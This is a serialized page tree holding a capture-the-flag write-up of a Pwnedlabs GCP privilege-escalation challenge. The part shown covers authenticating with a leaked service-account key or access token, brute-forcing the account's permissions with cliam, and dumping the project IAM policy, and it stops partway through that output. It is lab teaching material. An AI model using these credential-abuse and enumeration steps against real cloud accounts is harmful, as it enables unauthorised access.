[{"data":1,"prerenderedAt":5245},["ShallowReactive",2],{"content-query-C0TdfTs4KX":3},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":7,"head":9,"body":28,"_type":5239,"_id":5240,"_source":5241,"_file":5242,"_stem":5243,"_extension":5244},"/writeups/pwnedlabs-gcp-challenge","writeups",false,"","Pwnedlabs GCP Challenge",{"title":8,"description":10,"keywords":11,"slug":12,"image":13,"date":14,"meta":15},"This challenge was released as part of a presentation made for the launch of Pwnedlabs' GCRTP bootcamp.","cloud,GCP,Privesc","pwnedlabs-gcp-challenge","https://res.cloudinary.com/dmju5zuhr/image/upload/v1743721051/writeups/pwnedlabs.webp","2025-04-02",[16,17,18,19,21,23,24,26],{"og:image":13},{"og:title":8},{"og:description":10},{"og:type":20},"article",{"og:url":22},"https://owalid.com/pwnedlabs-gcp-challenge",{"description":10},{"title":25},"Pwnedlabs GCP Challenge writeup",{"keywords":27},"cloud,GCP,Privesc,writeups,pwnedlabs,ctf",{"type":29,"children":30,"toc":5231},"root",[31,38,45,62,68,73,79,86,93,98,112,154,159,196,202,215,227,232,237,267,284,359,368,400,421,445,451,456,470,586,591,597,602,607,625,630,854,859,1338,1343,1348,1371,1376,1381,1424,1553,1558,1772,1777,1782,1786,1798,1802,1807,1813,1827,1832,1853,1858,1863,1868,1904,2015,2019,2207,2212,2225,2229,2256,2260,2265,2269,2289,2295,2311,2316,2349,2361,2380,2385,2548,2553,2669,2674,2728,2753,2758,2791,2796,2859,2864,3005,3017,3628,3633,4363,4368,4606,4611,4617,4622,4627,4645,4679,4684,5085,5096,5167,5180,5220,5225],{"type":32,"tag":33,"props":34,"children":35},"element","h1",{"id":12},[36],{"type":37,"value":8},"text",{"type":32,"tag":39,"props":40,"children":42},"h2",{"id":41},"introduction",[43],{"type":37,"value":44},"Introduction",{"type":32,"tag":46,"props":47,"children":48},"p",{},[49,51,60],{"type":37,"value":50},"This challenge was released as part of a presentation made for the launch of ",{"type":32,"tag":52,"props":53,"children":57},"a",{"href":54,"rel":55},"https://pwnedlabs.io/",[56],"nofollow",[58],{"type":37,"value":59},"Pwnedlabs",{"type":37,"value":61},"' GCRTP bootcamp, where the first person to solve the challenge would win a voucher for the bootcamp, and I was lucky enough to get first blood on this challenge.",{"type":32,"tag":39,"props":63,"children":65},{"id":64},"starting-point",[66],{"type":37,"value":67},"Starting Point",{"type":32,"tag":46,"props":69,"children":70},{},[71],{"type":37,"value":72},"We begin our challenge with a URL that redirects us to a Google Drive page containing a GCP key in JSON format.",{"type":32,"tag":74,"props":75,"children":78},"custom-image",{"imgSrc":76,":width":77},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743698095/writeups/pwnedlabs-gcp-challenge/first-key.webp","1000",[],{"type":32,"tag":80,"props":81,"children":83},"h3",{"id":82},"authentication-methods-for-the-gcloud-sdk",[84],{"type":37,"value":85},"Authentication methods for the gcloud SDK",{"type":32,"tag":87,"props":88,"children":90},"h4",{"id":89},"service-account-key",[91],{"type":37,"value":92},"Service Account Key",{"type":32,"tag":46,"props":94,"children":95},{},[96],{"type":37,"value":97},"This is a JSON file containing credentials for a service account as described in the previous image, it is commonly used in scripts, CI/CD deployments, servers, etc.",{"type":32,"tag":46,"props":99,"children":100},{},[101,103,110],{"type":37,"value":102},"To use the key, we can use the ",{"type":32,"tag":104,"props":105,"children":107},"code",{"className":106},[],[108],{"type":37,"value":109},"gcloud",{"type":37,"value":111}," command line tool to authenticate with the service account using the following command:",{"type":32,"tag":113,"props":114,"children":116},"code-card",{"lang":115},"bash",[117],{"type":32,"tag":118,"props":119,"children":122},"pre",{"className":120,"code":121,"language":115,"meta":7,"style":7},"language-bash shiki shiki-themes vitesse-dark","gcloud auth activate-service-account --key-file=key.json\n",[123],{"type":32,"tag":104,"props":124,"children":125},{"__ignoreMap":7},[126],{"type":32,"tag":127,"props":128,"children":131},"span",{"class":129,"line":130},"line",1,[132,137,143,148],{"type":32,"tag":127,"props":133,"children":135},{"style":134},"--shiki-default:#80A665",[136],{"type":37,"value":109},{"type":32,"tag":127,"props":138,"children":140},{"style":139},"--shiki-default:#C98A7D",[141],{"type":37,"value":142}," auth",{"type":32,"tag":127,"props":144,"children":145},{"style":139},[146],{"type":37,"value":147}," activate-service-account",{"type":32,"tag":127,"props":149,"children":151},{"style":150},"--shiki-default:#C99076",[152],{"type":37,"value":153}," --key-file=key.json\n",{"type":32,"tag":46,"props":155,"children":156},{},[157],{"type":37,"value":158},"After authenticating, we can set the project to the one associated with the service account using:",{"type":32,"tag":113,"props":160,"children":161},{"lang":115},[162],{"type":32,"tag":118,"props":163,"children":165},{"className":120,"code":164,"language":115,"meta":7,"style":7},"gcloud config set project gr-proj-4\n",[166],{"type":32,"tag":104,"props":167,"children":168},{"__ignoreMap":7},[169],{"type":32,"tag":127,"props":170,"children":171},{"class":129,"line":130},[172,176,181,186,191],{"type":32,"tag":127,"props":173,"children":174},{"style":134},[175],{"type":37,"value":109},{"type":32,"tag":127,"props":177,"children":178},{"style":139},[179],{"type":37,"value":180}," config",{"type":32,"tag":127,"props":182,"children":183},{"style":139},[184],{"type":37,"value":185}," set",{"type":32,"tag":127,"props":187,"children":188},{"style":139},[189],{"type":37,"value":190}," project",{"type":32,"tag":127,"props":192,"children":193},{"style":139},[194],{"type":37,"value":195}," gr-proj-4\n",{"type":32,"tag":87,"props":197,"children":199},{"id":198},"access-token",[200],{"type":37,"value":201},"Access Token",{"type":32,"tag":46,"props":203,"children":204},{},[205,207,213],{"type":37,"value":206},"An Access Token is a temporary access token (generally valid for 1h) used to prove your identity to Google APIs. It has a specific format and will always start with ",{"type":32,"tag":104,"props":208,"children":210},{"className":209},[],[211],{"type":37,"value":212},"ya29.",{"type":37,"value":214},".",{"type":32,"tag":46,"props":216,"children":217},{},[218,220,226],{"type":37,"value":219},"It can be retrieved when connected to the SDK using the command: ",{"type":32,"tag":104,"props":221,"children":223},{"className":222},[],[224],{"type":37,"value":225},"gcloud auth print-access-token",{"type":37,"value":214},{"type":32,"tag":46,"props":228,"children":229},{},[230],{"type":37,"value":231},"Additionally, certain account compromise paths allow us, as a service account, to retrieve an access token from another service account. This will allow us to interact with the compromised account, as we will see later in the writeup.",{"type":32,"tag":46,"props":233,"children":234},{},[235],{"type":37,"value":236},"The access token can be used in two possible ways:",{"type":32,"tag":238,"props":239,"children":240},"ul",{},[241,255],{"type":32,"tag":242,"props":243,"children":244},"li",{},[245,247,253],{"type":37,"value":246},"By interacting directly with Google APIs by specifying it in an ",{"type":32,"tag":104,"props":248,"children":250},{"className":249},[],[251],{"type":37,"value":252},"Authorization bearer",{"type":37,"value":254}," header.",{"type":32,"tag":242,"props":256,"children":257},{},[258,260,265],{"type":37,"value":259},"Or to use it with the ",{"type":32,"tag":104,"props":261,"children":263},{"className":262},[],[264],{"type":37,"value":109},{"type":37,"value":266}," SDK, here are the steps to follow:",{"type":32,"tag":268,"props":269,"children":270},"ol",{},[271],{"type":32,"tag":242,"props":272,"children":273},{},[274,276,282],{"type":37,"value":275},"Set the access token in the environment variable ",{"type":32,"tag":104,"props":277,"children":279},{"className":278},[],[280],{"type":37,"value":281},"CLOUDSDK_AUTH_ACCESS_TOKEN",{"type":37,"value":283},":",{"type":32,"tag":113,"props":285,"children":286},{"lang":115},[287],{"type":32,"tag":118,"props":288,"children":290},{"className":120,"code":289,"language":115,"meta":7,"style":7},"export CLOUDSDK_AUTH_ACCESS_TOKEN=ya29.c.c0ASRK0Gbjv4[...SNIP...]irRX3JRyQrz1rS3xqVc8\n",[291],{"type":32,"tag":104,"props":292,"children":293},{"__ignoreMap":7},[294],{"type":32,"tag":127,"props":295,"children":296},{"class":129,"line":130},[297,303,309,315,320,325,330,334,339,344,349,354],{"type":32,"tag":127,"props":298,"children":300},{"style":299},"--shiki-default:#CB7676",[301],{"type":37,"value":302},"export",{"type":32,"tag":127,"props":304,"children":306},{"style":305},"--shiki-default:#BD976A",[307],{"type":37,"value":308}," CLOUDSDK_AUTH_ACCESS_TOKEN",{"type":32,"tag":127,"props":310,"children":312},{"style":311},"--shiki-default:#666666",[313],{"type":37,"value":314},"=",{"type":32,"tag":127,"props":316,"children":317},{"style":305},[318],{"type":37,"value":319},"ya29",{"type":32,"tag":127,"props":321,"children":323},{"style":322},"--shiki-default:#DBD7CAEE",[324],{"type":37,"value":214},{"type":32,"tag":127,"props":326,"children":327},{"style":305},[328],{"type":37,"value":329},"c",{"type":32,"tag":127,"props":331,"children":332},{"style":322},[333],{"type":37,"value":214},{"type":32,"tag":127,"props":335,"children":336},{"style":305},[337],{"type":37,"value":338},"c0ASRK0Gbjv4",{"type":32,"tag":127,"props":340,"children":341},{"style":311},[342],{"type":37,"value":343},"[",{"type":32,"tag":127,"props":345,"children":346},{"style":322},[347],{"type":37,"value":348},"...SNIP...",{"type":32,"tag":127,"props":350,"children":351},{"style":311},[352],{"type":37,"value":353},"]",{"type":32,"tag":127,"props":355,"children":356},{"style":305},[357],{"type":37,"value":358},"irRX3JRyQrz1rS3xqVc8\n",{"type":32,"tag":268,"props":360,"children":362},{"start":361},2,[363],{"type":32,"tag":242,"props":364,"children":365},{},[366],{"type":37,"value":367},"Set the project to the one associated with the service account using:",{"type":32,"tag":113,"props":369,"children":370},{"lang":115},[371],{"type":32,"tag":118,"props":372,"children":373},{"className":120,"code":164,"language":115,"meta":7,"style":7},[374],{"type":32,"tag":104,"props":375,"children":376},{"__ignoreMap":7},[377],{"type":32,"tag":127,"props":378,"children":379},{"class":129,"line":130},[380,384,388,392,396],{"type":32,"tag":127,"props":381,"children":382},{"style":134},[383],{"type":37,"value":109},{"type":32,"tag":127,"props":385,"children":386},{"style":139},[387],{"type":37,"value":180},{"type":32,"tag":127,"props":389,"children":390},{"style":139},[391],{"type":37,"value":185},{"type":32,"tag":127,"props":393,"children":394},{"style":139},[395],{"type":37,"value":190},{"type":32,"tag":127,"props":397,"children":398},{"style":139},[399],{"type":37,"value":195},{"type":32,"tag":268,"props":401,"children":403},{"start":402},3,[404,416],{"type":32,"tag":242,"props":405,"children":406},{},[407,409,414],{"type":37,"value":408},"Use the ",{"type":32,"tag":104,"props":410,"children":412},{"className":411},[],[413],{"type":37,"value":109},{"type":37,"value":415}," command as usual, and it will automatically use the access token for authentication.",{"type":32,"tag":242,"props":417,"children":418},{},[419],{"type":37,"value":420},"To unset the access token, you can use the command:",{"type":32,"tag":113,"props":422,"children":423},{"lang":115},[424],{"type":32,"tag":118,"props":425,"children":427},{"className":120,"code":426,"language":115,"meta":7,"style":7},"unset CLOUDSDK_AUTH_ACCESS_TOKEN\n",[428],{"type":32,"tag":104,"props":429,"children":430},{"__ignoreMap":7},[431],{"type":32,"tag":127,"props":432,"children":433},{"class":129,"line":130},[434,440],{"type":32,"tag":127,"props":435,"children":437},{"style":436},"--shiki-default:#B8A965",[438],{"type":37,"value":439},"unset",{"type":32,"tag":127,"props":441,"children":442},{"style":139},[443],{"type":37,"value":444}," CLOUDSDK_AUTH_ACCESS_TOKEN\n",{"type":32,"tag":39,"props":446,"children":448},{"id":447},"enumeration",[449],{"type":37,"value":450},"Enumeration",{"type":32,"tag":46,"props":452,"children":453},{},[454],{"type":37,"value":455},"From here, we have no information, so we need to proceed with enumerating our service account. To start, we'll examine what our service account can do and subsequently how our service account can interact with other service accounts.",{"type":32,"tag":46,"props":457,"children":458},{},[459,461,468],{"type":37,"value":460},"With ",{"type":32,"tag":52,"props":462,"children":465},{"href":463,"rel":464},"https://github.com/securisec/cliam",[56],[466],{"type":37,"value":467},"cliam",{"type":37,"value":469}," it is possible to brute force the actions that our service account is capable of performing.",{"type":32,"tag":113,"props":471,"children":472},{"lang":115},[473],{"type":32,"tag":118,"props":474,"children":476},{"className":120,"code":475,"language":115,"meta":7,"style":7},"cliam gcp --service-account=key.json --project-id gr-proj-4 bruteforce\nApr 04 00:34:58 DBG ● project=gr-proj-4 region=us-central1 zone=us-central1-a\nApr 04 00:35:06 INF ● resourcemanager.projects=get-iam-policy\n",[477],{"type":32,"tag":104,"props":478,"children":479},{"__ignoreMap":7},[480,512,556],{"type":32,"tag":127,"props":481,"children":482},{"class":129,"line":130},[483,487,492,497,502,507],{"type":32,"tag":127,"props":484,"children":485},{"style":134},[486],{"type":37,"value":467},{"type":32,"tag":127,"props":488,"children":489},{"style":139},[490],{"type":37,"value":491}," gcp",{"type":32,"tag":127,"props":493,"children":494},{"style":150},[495],{"type":37,"value":496}," --service-account=key.json",{"type":32,"tag":127,"props":498,"children":499},{"style":150},[500],{"type":37,"value":501}," --project-id",{"type":32,"tag":127,"props":503,"children":504},{"style":139},[505],{"type":37,"value":506}," gr-proj-4",{"type":32,"tag":127,"props":508,"children":509},{"style":139},[510],{"type":37,"value":511}," bruteforce\n",{"type":32,"tag":127,"props":513,"children":514},{"class":129,"line":361},[515,520,526,531,536,541,546,551],{"type":32,"tag":127,"props":516,"children":517},{"style":134},[518],{"type":37,"value":519},"Apr",{"type":32,"tag":127,"props":521,"children":523},{"style":522},"--shiki-default:#4C9A91",[524],{"type":37,"value":525}," 04",{"type":32,"tag":127,"props":527,"children":528},{"style":139},[529],{"type":37,"value":530}," 00:34:58",{"type":32,"tag":127,"props":532,"children":533},{"style":139},[534],{"type":37,"value":535}," DBG",{"type":32,"tag":127,"props":537,"children":538},{"style":139},[539],{"type":37,"value":540}," ●",{"type":32,"tag":127,"props":542,"children":543},{"style":139},[544],{"type":37,"value":545}," project=gr-proj-4",{"type":32,"tag":127,"props":547,"children":548},{"style":139},[549],{"type":37,"value":550}," region=us-central1",{"type":32,"tag":127,"props":552,"children":553},{"style":139},[554],{"type":37,"value":555}," zone=us-central1-a\n",{"type":32,"tag":127,"props":557,"children":558},{"class":129,"line":402},[559,563,567,572,577,581],{"type":32,"tag":127,"props":560,"children":561},{"style":134},[562],{"type":37,"value":519},{"type":32,"tag":127,"props":564,"children":565},{"style":522},[566],{"type":37,"value":525},{"type":32,"tag":127,"props":568,"children":569},{"style":139},[570],{"type":37,"value":571}," 00:35:06",{"type":32,"tag":127,"props":573,"children":574},{"style":139},[575],{"type":37,"value":576}," INF",{"type":32,"tag":127,"props":578,"children":579},{"style":139},[580],{"type":37,"value":540},{"type":32,"tag":127,"props":582,"children":583},{"style":139},[584],{"type":37,"value":585}," resourcemanager.projects=get-iam-policy\n",{"type":32,"tag":46,"props":587,"children":588},{},[589],{"type":37,"value":590},"After our enumeration we can see that our user can list IAM policies.",{"type":32,"tag":80,"props":592,"children":594},{"id":593},"how-iam-policies-work-on-gcp",[595],{"type":37,"value":596},"How iam policies work on GCP ?",{"type":32,"tag":46,"props":598,"children":599},{},[600],{"type":37,"value":601},"In GCP, an IAM Policy is a set of rules that define who can do what on which resource. It controls access by assigning roles to members on specific resources.",{"type":32,"tag":46,"props":603,"children":604},{},[605],{"type":37,"value":606},"An IAM Policy consists of bindings that associate:",{"type":32,"tag":238,"props":608,"children":609},{},[610,615,620],{"type":32,"tag":242,"props":611,"children":612},{},[613],{"type":37,"value":614},"One or more members (users, groups, service accounts)",{"type":32,"tag":242,"props":616,"children":617},{},[618],{"type":37,"value":619},"A role (predefined or custom)",{"type":32,"tag":242,"props":621,"children":622},{},[623],{"type":37,"value":624},"A condition (optional, to restrict access based on criteria)",{"type":32,"tag":46,"props":626,"children":627},{},[628],{"type":37,"value":629},"Here is an example of an IAM Policy (JSON):",{"type":32,"tag":113,"props":631,"children":633},{"lang":632},"json",[634],{"type":32,"tag":118,"props":635,"children":638},{"className":636,"code":637,"language":632,"meta":7,"style":7},"language-json shiki shiki-themes vitesse-dark","{\n  \"role\": \"roles/storage.objectViewer\",\n  \"members\": [\"user:alice@example.com\"],\n  \"condition\": {\n    \"title\": \"TemporaryAccess\",\n    \"expression\": \"request.time \u003C timestamp('2025-01-01T00:00:00Z')\"\n  }\n}\n",[639],{"type":32,"tag":104,"props":640,"children":641},{"__ignoreMap":7},[642,650,693,736,762,801,836,845],{"type":32,"tag":127,"props":643,"children":644},{"class":129,"line":130},[645],{"type":32,"tag":127,"props":646,"children":647},{"style":311},[648],{"type":37,"value":649},"{\n",{"type":32,"tag":127,"props":651,"children":652},{"class":129,"line":361},[653,659,664,669,673,679,684,688],{"type":32,"tag":127,"props":654,"children":656},{"style":655},"--shiki-default:#B8A96577",[657],{"type":37,"value":658},"  \"",{"type":32,"tag":127,"props":660,"children":661},{"style":436},[662],{"type":37,"value":663},"role",{"type":32,"tag":127,"props":665,"children":666},{"style":655},[667],{"type":37,"value":668},"\"",{"type":32,"tag":127,"props":670,"children":671},{"style":311},[672],{"type":37,"value":283},{"type":32,"tag":127,"props":674,"children":676},{"style":675},"--shiki-default:#C98A7D77",[677],{"type":37,"value":678}," \"",{"type":32,"tag":127,"props":680,"children":681},{"style":139},[682],{"type":37,"value":683},"roles/storage.objectViewer",{"type":32,"tag":127,"props":685,"children":686},{"style":675},[687],{"type":37,"value":668},{"type":32,"tag":127,"props":689,"children":690},{"style":311},[691],{"type":37,"value":692},",\n",{"type":32,"tag":127,"props":694,"children":695},{"class":129,"line":402},[696,700,705,709,713,718,722,727,731],{"type":32,"tag":127,"props":697,"children":698},{"style":655},[699],{"type":37,"value":658},{"type":32,"tag":127,"props":701,"children":702},{"style":436},[703],{"type":37,"value":704},"members",{"type":32,"tag":127,"props":706,"children":707},{"style":655},[708],{"type":37,"value":668},{"type":32,"tag":127,"props":710,"children":711},{"style":311},[712],{"type":37,"value":283},{"type":32,"tag":127,"props":714,"children":715},{"style":311},[716],{"type":37,"value":717}," [",{"type":32,"tag":127,"props":719,"children":720},{"style":675},[721],{"type":37,"value":668},{"type":32,"tag":127,"props":723,"children":724},{"style":139},[725],{"type":37,"value":726},"user:alice@example.com",{"type":32,"tag":127,"props":728,"children":729},{"style":675},[730],{"type":37,"value":668},{"type":32,"tag":127,"props":732,"children":733},{"style":311},[734],{"type":37,"value":735},"],\n",{"type":32,"tag":127,"props":737,"children":739},{"class":129,"line":738},4,[740,744,749,753,757],{"type":32,"tag":127,"props":741,"children":742},{"style":655},[743],{"type":37,"value":658},{"type":32,"tag":127,"props":745,"children":746},{"style":436},[747],{"type":37,"value":748},"condition",{"type":32,"tag":127,"props":750,"children":751},{"style":655},[752],{"type":37,"value":668},{"type":32,"tag":127,"props":754,"children":755},{"style":311},[756],{"type":37,"value":283},{"type":32,"tag":127,"props":758,"children":759},{"style":311},[760],{"type":37,"value":761}," {\n",{"type":32,"tag":127,"props":763,"children":765},{"class":129,"line":764},5,[766,771,776,780,784,788,793,797],{"type":32,"tag":127,"props":767,"children":768},{"style":655},[769],{"type":37,"value":770},"    \"",{"type":32,"tag":127,"props":772,"children":773},{"style":436},[774],{"type":37,"value":775},"title",{"type":32,"tag":127,"props":777,"children":778},{"style":655},[779],{"type":37,"value":668},{"type":32,"tag":127,"props":781,"children":782},{"style":311},[783],{"type":37,"value":283},{"type":32,"tag":127,"props":785,"children":786},{"style":675},[787],{"type":37,"value":678},{"type":32,"tag":127,"props":789,"children":790},{"style":139},[791],{"type":37,"value":792},"TemporaryAccess",{"type":32,"tag":127,"props":794,"children":795},{"style":675},[796],{"type":37,"value":668},{"type":32,"tag":127,"props":798,"children":799},{"style":311},[800],{"type":37,"value":692},{"type":32,"tag":127,"props":802,"children":804},{"class":129,"line":803},6,[805,809,814,818,822,826,831],{"type":32,"tag":127,"props":806,"children":807},{"style":655},[808],{"type":37,"value":770},{"type":32,"tag":127,"props":810,"children":811},{"style":436},[812],{"type":37,"value":813},"expression",{"type":32,"tag":127,"props":815,"children":816},{"style":655},[817],{"type":37,"value":668},{"type":32,"tag":127,"props":819,"children":820},{"style":311},[821],{"type":37,"value":283},{"type":32,"tag":127,"props":823,"children":824},{"style":675},[825],{"type":37,"value":678},{"type":32,"tag":127,"props":827,"children":828},{"style":139},[829],{"type":37,"value":830},"request.time \u003C timestamp('2025-01-01T00:00:00Z')",{"type":32,"tag":127,"props":832,"children":833},{"style":675},[834],{"type":37,"value":835},"\"\n",{"type":32,"tag":127,"props":837,"children":839},{"class":129,"line":838},7,[840],{"type":32,"tag":127,"props":841,"children":842},{"style":311},[843],{"type":37,"value":844},"  }\n",{"type":32,"tag":127,"props":846,"children":848},{"class":129,"line":847},8,[849],{"type":32,"tag":127,"props":850,"children":851},{"style":311},[852],{"type":37,"value":853},"}\n",{"type":32,"tag":46,"props":855,"children":856},{},[857],{"type":37,"value":858},"Listing IAM policies allows us to gain more insights into the permissions and names of users or service accounts that could be used - this is important information for exploiting attack paths to another account.",{"type":32,"tag":113,"props":860,"children":861},{"lang":115},[862],{"type":32,"tag":118,"props":863,"children":865},{"className":120,"code":864,"language":115,"meta":7,"style":7},"gcloud projects get-iam-policy gr-proj-4\n\n- members:\n  - serviceAccount:payments@gr-proj-4.iam.gserviceaccount.com\n  role: projects/gr-proj-4/roles/PaymentsStorage\n- members:\n  - serviceAccount:staging@gr-proj-4.iam.gserviceaccount.com\n  role: projects/gr-proj-4/roles/Staging2\n- members:\n  - serviceAccount:analytics@gr-proj-4.iam.gserviceaccount.com\n  role: roles/analyticshub.viewer\n- members:\n  - serviceAccount:analytics@gr-proj-4.iam.gserviceaccount.com\n  role: roles/bigquery.dataViewer\n- members:\n  - serviceAccount:sql-424@gr-proj-4.iam.gserviceaccount.com\n  role: roles/cloudsql.viewer\n- members:\n  - serviceAccount:platform-middleware@gr-proj-4.iam.gserviceaccount.com\n  role: roles/compute.viewer\n- members:\n  - user:ian@pwnedlabs.io\n  role: roles/owner\n- members:\n  - serviceAccount:platform-middleware@gr-proj-4.iam.gserviceaccount.com\n  role: roles/run.invoker\n- members:\n  - serviceAccount:platform-middleware@gr-proj-4.iam.gserviceaccount.com\n  role: roles/secretmanager.viewer\n- members:\n  - serviceAccount:payments@gr-proj-4.iam.gserviceaccount.com\n  role: roles/storage.bucketViewer\n- members:\n  - serviceAccount:payments@gr-proj-4.iam.gserviceaccount.com\n  role: roles/storage.objectViewer\netag: BwYxzfQaKR4=\nversion: 1\n",[866],{"type":32,"tag":104,"props":867,"children":868},{"__ignoreMap":7},[869,890,899,912,925,938,949,961,973,985,998,1011,1023,1035,1048,1060,1073,1086,1098,1111,1124,1136,1149,1162,1174,1186,1199,1211,1223,1236,1248,1260,1273,1285,1297,1310,1324],{"type":32,"tag":127,"props":870,"children":871},{"class":129,"line":130},[872,876,881,886],{"type":32,"tag":127,"props":873,"children":874},{"style":134},[875],{"type":37,"value":109},{"type":32,"tag":127,"props":877,"children":878},{"style":139},[879],{"type":37,"value":880}," projects",{"type":32,"tag":127,"props":882,"children":883},{"style":139},[884],{"type":37,"value":885}," get-iam-policy",{"type":32,"tag":127,"props":887,"children":888},{"style":139},[889],{"type":37,"value":195},{"type":32,"tag":127,"props":891,"children":892},{"class":129,"line":361},[893],{"type":32,"tag":127,"props":894,"children":896},{"emptyLinePlaceholder":895},true,[897],{"type":37,"value":898},"\n",{"type":32,"tag":127,"props":900,"children":901},{"class":129,"line":402},[902,907],{"type":32,"tag":127,"props":903,"children":904},{"style":134},[905],{"type":37,"value":906},"-",{"type":32,"tag":127,"props":908,"children":909},{"style":139},[910],{"type":37,"value":911}," members:\n",{"type":32,"tag":127,"props":913,"children":914},{"class":129,"line":738},[915,920],{"type":32,"tag":127,"props":916,"children":917},{"style":134},[918],{"type":37,"value":919},"  -",{"type":32,"tag":127,"props":921,"children":922},{"style":139},[923],{"type":37,"value":924}," serviceAccount:payments@gr-proj-4.iam.gserviceaccount.com\n",{"type":32,"tag":127,"props":926,"children":927},{"class":129,"line":764},[928,933],{"type":32,"tag":127,"props":929,"children":930},{"style":134},[931],{"type":37,"value":932},"  role:",{"type":32,"tag":127,"props":934,"children":935},{"style":139},[936],{"type":37,"value":937}," projects/gr-proj-4/roles/PaymentsStorage\n",{"type":32,"tag":127,"props":939,"children":940},{"class":129,"line":803},[941,945],{"type":32,"tag":127,"props":942,"children":943},{"style":134},[944],{"type":37,"value":906},{"type":32,"tag":127,"props":946,"children":947},{"style":139},[948],{"type":37,"value":911},{"type":32,"tag":127,"props":950,"children":951},{"class":129,"line":838},[952,956],{"type":32,"tag":127,"props":953,"children":954},{"style":134},[955],{"type":37,"value":919},{"type":32,"tag":127,"props":957,"children":958},{"style":139},[959],{"type":37,"value":960}," serviceAccount:staging@gr-proj-4.iam.gserviceaccount.com\n",{"type":32,"tag":127,"props":962,"children":963},{"class":129,"line":847},[964,968],{"type":32,"tag":127,"props":965,"children":966},{"style":134},[967],{"type":37,"value":932},{"type":32,"tag":127,"props":969,"children":970},{"style":139},[971],{"type":37,"value":972}," projects/gr-proj-4/roles/Staging2\n",{"type":32,"tag":127,"props":974,"children":976},{"class":129,"line":975},9,[977,981],{"type":32,"tag":127,"props":978,"children":979},{"style":134},[980],{"type":37,"value":906},{"type":32,"tag":127,"props":982,"children":983},{"style":139},[984],{"type":37,"value":911},{"type":32,"tag":127,"props":986,"children":988},{"class":129,"line":987},10,[989,993],{"type":32,"tag":127,"props":990,"children":991},{"style":134},[992],{"type":37,"value":919},{"type":32,"tag":127,"props":994,"children":995},{"style":139},[996],{"type":37,"value":997}," serviceAccount:analytics@gr-proj-4.iam.gserviceaccount.com\n",{"type":32,"tag":127,"props":999,"children":1001},{"class":129,"line":1000},11,[1002,1006],{"type":32,"tag":127,"props":1003,"children":1004},{"style":134},[1005],{"type":37,"value":932},{"type":32,"tag":127,"props":1007,"children":1008},{"style":139},[1009],{"type":37,"value":1010}," roles/analyticshub.viewer\n",{"type":32,"tag":127,"props":1012,"children":1014},{"class":129,"line":1013},12,[1015,1019],{"type":32,"tag":127,"props":1016,"children":1017},{"style":134},[1018],{"type":37,"value":906},{"type":32,"tag":127,"props":1020,"children":1021},{"style":139},[1022],{"type":37,"value":911},{"type":32,"tag":127,"props":1024,"children":1026},{"class":129,"line":1025},13,[1027,1031],{"type":32,"tag":127,"props":1028,"children":1029},{"style":134},[1030],{"type":37,"value":919},{"type":32,"tag":127,"props":1032,"children":1033},{"style":139},[1034],{"type":37,"value":997},{"type":32,"tag":127,"props":1036,"children":1038},{"class":129,"line":1037},14,[1039,1043],{"type":32,"tag":127,"props":1040,"children":1041},{"style":134},[1042],{"type":37,"value":932},{"type":32,"tag":127,"props":1044,"children":1045},{"style":139},[1046],{"type":37,"value":1047}," roles/bigquery.dataViewer\n",{"type":32,"tag":127,"props":1049,"children":1051},{"class":129,"line":1050},15,[1052,1056],{"type":32,"tag":127,"props":1053,"children":1054},{"style":134},[1055],{"type":37,"value":906},{"type":32,"tag":127,"props":1057,"children":1058},{"style":139},[1059],{"type":37,"value":911},{"type":32,"tag":127,"props":1061,"children":1063},{"class":129,"line":1062},16,[1064,1068],{"type":32,"tag":127,"props":1065,"children":1066},{"style":134},[1067],{"type":37,"value":919},{"type":32,"tag":127,"props":1069,"children":1070},{"style":139},[1071],{"type":37,"value":1072}," serviceAccount:sql-424@gr-proj-4.iam.gserviceaccount.com\n",{"type":32,"tag":127,"props":1074,"children":1076},{"class":129,"line":1075},17,[1077,1081],{"type":32,"tag":127,"props":1078,"children":1079},{"style":134},[1080],{"type":37,"value":932},{"type":32,"tag":127,"props":1082,"children":1083},{"style":139},[1084],{"type":37,"value":1085}," roles/cloudsql.viewer\n",{"type":32,"tag":127,"props":1087,"children":1089},{"class":129,"line":1088},18,[1090,1094],{"type":32,"tag":127,"props":1091,"children":1092},{"style":134},[1093],{"type":37,"value":906},{"type":32,"tag":127,"props":1095,"children":1096},{"style":139},[1097],{"type":37,"value":911},{"type":32,"tag":127,"props":1099,"children":1101},{"class":129,"line":1100},19,[1102,1106],{"type":32,"tag":127,"props":1103,"children":1104},{"style":134},[1105],{"type":37,"value":919},{"type":32,"tag":127,"props":1107,"children":1108},{"style":139},[1109],{"type":37,"value":1110}," serviceAccount:platform-middleware@gr-proj-4.iam.gserviceaccount.com\n",{"type":32,"tag":127,"props":1112,"children":1114},{"class":129,"line":1113},20,[1115,1119],{"type":32,"tag":127,"props":1116,"children":1117},{"style":134},[1118],{"type":37,"value":932},{"type":32,"tag":127,"props":1120,"children":1121},{"style":139},[1122],{"type":37,"value":1123}," roles/compute.viewer\n",{"type":32,"tag":127,"props":1125,"children":1127},{"class":129,"line":1126},21,[1128,1132],{"type":32,"tag":127,"props":1129,"children":1130},{"style":134},[1131],{"type":37,"value":906},{"type":32,"tag":127,"props":1133,"children":1134},{"style":139},[1135],{"type":37,"value":911},{"type":32,"tag":127,"props":1137,"children":1139},{"class":129,"line":1138},22,[1140,1144],{"type":32,"tag":127,"props":1141,"children":1142},{"style":134},[1143],{"type":37,"value":919},{"type":32,"tag":127,"props":1145,"children":1146},{"style":139},[1147],{"type":37,"value":1148}," user:ian@pwnedlabs.io\n",{"type":32,"tag":127,"props":1150,"children":1152},{"class":129,"line":1151},23,[1153,1157],{"type":32,"tag":127,"props":1154,"children":1155},{"style":134},[1156],{"type":37,"value":932},{"type":32,"tag":127,"props":1158,"children":1159},{"style":139},[1160],{"type":37,"value":1161}," 